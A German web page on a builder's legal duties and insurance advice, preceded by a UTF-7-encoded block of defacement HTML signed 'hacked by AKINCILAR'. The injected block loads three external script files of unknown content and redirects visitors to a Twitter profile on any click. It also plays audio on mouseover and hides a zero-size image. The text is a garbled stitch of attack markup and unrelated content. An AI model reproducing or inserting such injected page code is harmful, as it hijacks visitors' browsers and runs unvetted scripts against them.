+ADw-/title+AD4APAAh-DOCTYPE type+AD4 +ADw-html+AD4APA-head+AD4APA-script src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/init3.js+ACIAPgA8-/script+AD4APA-script src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/usr3.js+ACIAPgA8-/script+AD4 +ADw-script type+AD0AIg-text/javascript+ACI id+AD0AIg-2f2a695a6afce2c2d833c706cd677a8e+ACI src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/a.js+ACIAPgA8-/script+AD4 +ADw-meta http-equiv+AD0AIg-Content-Type+ACI content+AD0AIg-text/html+ADs charset+AD0-UTF-8+ACIAPg +ADw-title+AD4-HACKED+ACEAPA-/title+AD4 +ADw-meta charset+AD0AIg-UTF-8+ACIAPg +ADw-script+AD4-function hack()+AHs-window.location+AD0AIg-https://twitter.com/CyberWarriorTim+ACIAOwB9 function oynat()+AHs var player+AD0 document.getElementById(‘pl’)+ADs player.play()+ADsAfQA8-/script+AD4 +ADw-style+AD4 +ACM-hack+AHs-height:1200px+ADs-width:1128px+ADs margin:0 auto+ADs-background: url(http://www.hizliresimyukle.com/images/2014/08/27/almanyandex.png) no-repeat+ADs +AH0 +ACM-play+AHs-height:60px+ADs width:60px+ADs-position:absolute+ADs margin-top:795px+ADs margin-left:525px+ADsAfQ +ACM-play2+AHs-height:60px+ADs width:60px+ADs-position:absolute+ADs margin-top:1055px+ADs margin-left:525px+ADsAfQ body+AHs width:auto+ADs height:auto+ADs background: url(+ACI-http://www.hizliresimyukle.com/images/2014/08/21/Bg.png+ACI)+ADs +AH0 +ADw-/style+AD4 +ADw-/head+AD4 +ADw-body onmousedown+AD0AIg-hack()+ACIAPg +ADw-div id+AD0AIg-hack+ACIAPgA8-audio id+AD0AIg-pl+ACIAPgA8-source src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/mehter.mp3+ACI type+AD0AIg-audio/mpeg+ACIAPgA8-/audio+AD4APA-div id+AD0AIg-play+ACI onmouseover+AD0AIg-oynat()+ACIAPgA8-/div+AD4APA-div id+AD0AIg-play2+ACI onmouseover+AD0AIg-oynat()+ACIAPgA8-/div+AD4APA-/div+AD4 +ADwAIQ—hacked by AKINCILAR–+AD4 +ADw-img src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/boot.gif+ACI height+AD0AIg-0+ACI width+AD0AIg-0+ACIAPgA8-/body+AD4APA-/html+AD4APA-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4-

Der erste Spatenstich beginnt mit einer guten Versicherung für den Bauherrn

Flower

Pflichten des Bauherrn

Der Bauherr hat 3 Pflichten zu erfüllen:

■      Auswahlpflicht

Mit der Auswahlpflicht sind Sie zur sorgfältigen Auswahl eines befähigten Architekten, einer vernünftiger Baufirma bzw. geeigneter Handwerker verpflichtet. Auch technisch unbegabte Bauherren können sich laut Rechtsprechung dieser Auswahlpflicht nicht entziehen.

Diese Sorgfaltspflicht ist gerade bei Baufirmen und Fertighausherstellern aus dem osteuropäischen Ausland gegeben, die besonders günstig auf dem deutschen Markt werben. Ob die zu verwendenden Materialien und Baumaschinen dem deutschen Qualitätsstandard genügen, ist eine andere Frage. Aber dass sie verantwortlich sind, steht außer Frage.

Allein das aus einem Baufahrzeug auslaufende Öl verschmutzt bereits den Erdboden, was ein ansonsten vermeidbarer Schaden sein könnte.

Unsere Empfehlung:
Lassen Sie sich Referenzen vorlegen und besichtigen Sie von diesen Firmen bereits fertig gestellte Bauprojekte. Dies dient nicht nur Ihrer eigenen Sicherheit, sondern auch der Sicherheit anderer. Außerdem vermeiden Sie so mögliche Schäden.

■      Verkehrssicherungspflicht

Die Verkehrssicherungspflicht besagt, dass es als Verantwortlicher Ihre Aufgabe ist, alles zu unternehmen, um vorhandene Gefahrenquellen auszumerzen. Dies betrifft das Einrichten, Absperren und das gründliche Absichern der Baustelle, seiner Zufahrt sowie des Materiallagers.

Die Verkehrssicherungspflicht kann auch auf die am Bau Mitwirkenden delegiert werden. Zu den Mitwirkenden zählen der beauftragte Architekt, die Baufirma mit ihrem Bauleiter und die mitwirkenden Handwerker.

Ob dieser Personenkreis für die Schäden aufkommt, ist nicht vorhersehbar. Denn bei einer Zahlungsunfähigkeit oder Insolvenz bleibt diese Last wieder an Ihnen hängen. Genauer gesagt, sie haften gesamtschuldnerisch.

Unsere Empfehlung:
Überzeugen Sie sich selbst, dass die am Bau mitwirkenden Verantwortlichen
eine gültige und bezahlte Haftpflichtversicherung nachweisen können, die Sie mit entlastet. Eine seriöse Firma wird Ihrer Bitte gerne nachkommen.

■      Überwachungspflicht

Der Überwachungspflicht müssen Sie ständig nachkommen. Darunter fällt die Überwachung der Baustelle und die Kontrolle, ob die Sicherheitsmaßnahmen auch wirklich befolgt werden.

Unsere Empfehlung:
Kontrollieren Sie Ihre Baustelle regelmäßig, ob es Mängel bei der Absicherung gibt. Eine deutlich lesbare Beschilderung zur Warnung vor unbefugtem Zutritt ist als Hinweis von Nutzen, aber nicht das Non plus ultra.

Untersuchen Sie daher den Bauzaun auf seine Stabilität, um spielende Kinder oder andere Unbefugte von der Baustelle fernzuhalten.

Außerdem darf die Baustelle keine Gefahr für den evtl. angrenzenden öffentlichen Straßenverkehr und für die Nachbargrundstücke darstellen, z. B. indem der Baukran gesichert wird.